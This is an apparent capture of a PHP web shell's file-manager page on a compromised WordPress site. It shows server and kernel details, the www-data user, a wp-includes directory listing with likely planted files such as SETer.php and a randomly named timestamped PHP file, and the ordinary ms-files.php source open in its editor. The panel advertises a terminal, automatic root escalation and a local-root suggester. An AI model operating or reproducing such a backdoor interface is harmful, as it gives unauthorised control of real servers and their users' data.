Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 18.189.13.48
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
RCfDPpl-20250514065754.php
15.78
KB
-rw-r--r--
2025-05-09 05:54
SETer.php
166.01
KB
-rw-r--r--
2025-03-30 05:28
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-http.php
367
B
-rw-r--r--
2022-06-17 11:20
class-wp-dependencies.php
14.78
KB
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-user.php
22.46
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
class.wp-styles.php
338
B
-rw-r--r--
2022-09-20 14:17
comment-date.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
editor.css
856
B
-rw-r--r--
2024-07-16 17:55
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-files.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
pattern.php
1.75
KB
-rw-r--r--
2025-04-15 17:44
rss.php
22.57
KB
-rw-r--r--
2024-11-13 12:36
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
shortcodes.php
23.49
KB
-rw-r--r--
2024-07-16 17:55
speculative-loading.php
8.36
KB
-rw-r--r--
2025-04-15 17:44
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
wp-db.php
445
B
-rw-r--r--
2022-07-21 22:45
Save
Rename
<?php /** * Multisite upload handler. * * @since 3.0.0 * * @package WordPress * @subpackage Multisite */ define( 'MS_FILES_REQUEST', true ); define( 'SHORTINIT', true ); /** Load WordPress Bootstrap */ require_once dirname( __DIR__ ) . '/wp-load.php'; if ( ! is_multisite() ) { die( 'Multisite support not enabled' ); } ms_file_constants(); if ( '1' === $current_blog->archived || '1' === $current_blog->spam || '1' === $current_blog->deleted ) { status_header( 404 ); die( '404 — File not found.' ); } $file = rtrim( BLOGUPLOADDIR, '/' ) . '/' . str_replace( '..', '', $_GET['file'] ); if ( ! is_file( $file ) ) { status_header( 404 ); die( '404 — File not found.' ); } $mime = wp_check_filetype( $file ); if ( false === $mime['type'] && function_exists( 'mime_content_type' ) ) { $mime['type'] = mime_content_type( $file ); } if ( $mime['type'] ) { $mimetype = $mime['type']; } else { $mimetype = 'image/' . substr( $file, strrpos( $file, '.' ) + 1 ); } header( 'Content-Type: ' . $mimetype ); // Always send this. if ( ! str_contains( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) ) { header( 'Content-Length: ' . filesize( $file ) ); } // Optional support for X-Sendfile and X-Accel-Redirect. if ( WPMU_ACCEL_REDIRECT ) { header( 'X-Accel-Redirect: ' . str_replace( WP_CONTENT_DIR, '', $file ) ); exit; } elseif ( WPMU_SENDFILE ) { header( 'X-Sendfile: ' . $file ); exit; } $wp_last_modified = gmdate( 'D, d M Y H:i:s', filemtime( $file ) ); $wp_etag = '"' . md5( $wp_last_modified ) . '"'; header( "Last-Modified: $wp_last_modified GMT" ); header( 'ETag: ' . $wp_etag ); header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + 100000000 ) . ' GMT' ); // Support for conditional GET - use stripslashes() to avoid formatting.php dependency. if ( isset( $_SERVER['HTTP_IF_NONE_MATCH'] ) ) { $client_etag = stripslashes( $_SERVER['HTTP_IF_NONE_MATCH'] ); } else { $client_etag = ''; } if ( isset( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ) ) { $client_last_modified = trim( $_SERVER['HTTP_IF_MODIFIED_SINCE'] ); } else { $client_last_modified = ''; } // If string is empty, return 0. If not, attempt to parse into a timestamp. $client_modified_timestamp = $client_last_modified ? strtotime( $client_last_modified ) : 0; // Make a timestamp for our most recent modification. $wp_modified_timestamp = strtotime( $wp_last_modified ); if ( ( $client_last_modified && $client_etag ) ? ( ( $client_modified_timestamp >= $wp_modified_timestamp ) && ( $client_etag === $wp_etag ) ) : ( ( $client_modified_timestamp >= $wp_modified_timestamp ) || ( $client_etag === $wp_etag ) ) ) { status_header( 304 ); exit; } // If we made it this far, just serve the file. readfile( $file ); flush();